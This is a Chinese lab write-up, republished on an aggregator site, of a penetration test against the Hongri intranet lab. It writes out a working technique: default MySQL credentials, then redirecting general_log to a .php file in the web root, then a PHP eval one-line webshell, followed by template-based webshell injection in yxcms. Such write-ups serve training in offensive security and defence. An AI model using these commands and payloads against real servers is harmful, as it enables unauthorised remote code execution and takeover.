ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

红日靶场(内网渗透)——1

2022-05-12 09:03:26  阅读:250  来源: 互联网

标签:红日 248.129 渗透 ip win7 192.168 general 靶场 日志


1.靶机信息。

win7 x64:ip:192.168.248.129

2008: ip:192.168.138

win2k3:192.168.52.141

攻击机信息:

kali:集成各种攻击工具  ip:192.168.248.128

win10:主要进行数据整理。

2.信息搜集。

1)使用kali扫描靶机

netdiscover -r 靶机IP网段

 

 

 发现win7外网网址为:192.168.248.129

对192.168.248.129进行端口扫描。

 

 

 发现开放端口80及3306.

确定使用HTTP和MYSQL服务。确定思路,使用SQL注入进行提权。

2)网站信息搜集

对网目录进行扫描,发现phpmyadmin页面:

 

 

 同时发现网站页面底部有mysql的连接测试检测:

 

 

 尝试root/root,连接成功:

 

 

 利用之前得到的信息,直接登录phpmyadmin,直接对mysql进行管理:

 

 

 3)利用sql进行getshell

利用步骤:

1.利用日志文件。

开启日志记录以及日志保存目录

SHOW VARIABLES LIKE '%general_log%'

 

 

 

SET GLOBAL general_log = "ON"

 

 

 将日志文件保存为php文件

SET GLOBAL general_log_file="C:/phpStudy/www/1.php"

 

 

 

2.利用一句话马

执行一句话马

SELECT '<?php eval($_POST["cmd"]);?>';

 

 利用菜刀进行连接:

 

 发现beifen.rar,应该为网站源码,下载查看。

 

 打开/yxcms/index.php,发现用户名admin和密码123456:

 

 登录,发现可以进行前台模板管理,注入一句话马:

 

 通过beifen.rar确定路径后,菜刀连接,至此win7权限已经获取完毕。之后进行内网渗透,请见下一篇文章。

 

标签:红日,248.129,渗透,ip,win7,192.168,general,靶场,日志
来源: https://www.cnblogs.com/yaolingyu/p/16260320.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有